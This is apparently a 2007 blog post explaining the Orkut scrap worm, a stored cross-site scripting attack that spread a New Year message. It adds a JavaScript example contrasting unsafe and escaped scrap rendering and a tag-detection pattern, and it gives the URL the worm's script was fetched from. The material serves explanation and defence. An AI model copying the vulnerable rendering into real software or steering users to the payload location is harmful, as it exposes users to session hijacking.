Microsoft Anti Virus


Tuesday, 18 December 2007

Orkut XSS attack - that "2008 vem ai... que ele comece mto bem para vc" thingie

Posted on 20:04 by Unknown



A lot of you have probably been wondering how you received a scrap saying "2008 vem ai... que ele comece mto bem para vc" from me, or possibly from some friend of yours.



It's called an XSS attack, or cross-site scripting attack. A piece of JavaScript code (run on the client side, that is, in your browser) gets executed when you open a scrap sent from a friend's ID (after his Orkut session was already infected with the malicious code) carrying the spam message, and it then starts scrapping everyone. This happens when you log into your Orkut scrapbook and read the malicious scrap.

In other words, when someone sends you the spam scrap and you read it, the same scrap is sent to all your friends from your account. This will keep spreading for the next few days, possibly until Orkut takes some measures.
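The mechanism above comes down to one bug class: scrap text from another user is rendered as HTML instead of as text. As an added example that is not from the original post or from Orkut's own code, here is a minimal scrap renderer in JavaScript showing the vulnerable concatenation beside the escaped version, with a constructed sample scrap carrying the worm's visible message and a placeholder script tag. All function names and the sample scrap are assumptions.

```javascript
// Added example, not code from the original post or from Orkut.
// Demonstrates the stored-XSS bug class behind the scrap worm: untrusted
// scrap text concatenated into HTML (vulnerable) vs. HTML-encoded (hardened).

// Characters that carry meaning in HTML text and attribute contexts.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text so the browser displays it instead of parsing it.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the scrap body is trusted as markup, so any <script>
// or <embed> a sender includes is parsed and runs in the reader's session.
function renderScrapUnsafe(scrap) {
  return `<div class="scrap"><b>${scrap.from}</b>: ${scrap.text}</div>`;
}

// Hardened pattern: every untrusted field is encoded for its HTML context,
// so the very same scrap is shown as literal text and nothing executes.
function renderScrapSafe(scrap) {
  return `<div class="scrap"><b>${escapeHtml(scrap.from)}</b>: ${escapeHtml(scrap.text)}</div>`;
}

// Simple self-check a reviewer can run over rendered output: does the markup
// still contain an element that can execute code or load active content?
function containsActiveMarkup(html) {
  return /<\s*(script|embed|object|iframe)\b/i.test(html);
}

// Constructed sample scrap (hypothetical sender, placeholder script body):
// the worm's visible message followed by a script tag.
const SAMPLE_SCRAP = {
  from: 'a friend',
  text: '2008 vem ai... que ele comece mto bem para vc <script>/* placeholder */</script>',
};

// Stand-alone run: the unsafe renderer leaks the script tag, the safe one does not.
console.log(containsActiveMarkup(renderScrapUnsafe(SAMPLE_SCRAP)));  // true
console.log(containsActiveMarkup(renderScrapSafe(SAMPLE_SCRAP)));    // false
```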

Steps you can take:

If possible, change your Gmail account password and do not log in to Orkut till they sort this out.



Courtesy: Antrix.net (find link in comments)

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js




The Orkut website is built on ASP.NET; if you wish to read the technical side of preventing XSS attacks in ASP.NET, go here.



Update:

1.) The problem seems to have been sorted out by Orkut in 2 days (that's long).

2.) 400,000 users affected.

3.) Top users affected by country: US, Germany, India, Brazil.

4.) Orkut has still not accepted it was a mistake from their side. The official Orkut blog is still mum on the incident.

5.) Your password is safe, though it would have been possible to hack your Gmail password if, say, the virus had redirected you to a page which looked exactly like Orkut and asked you to log in again.


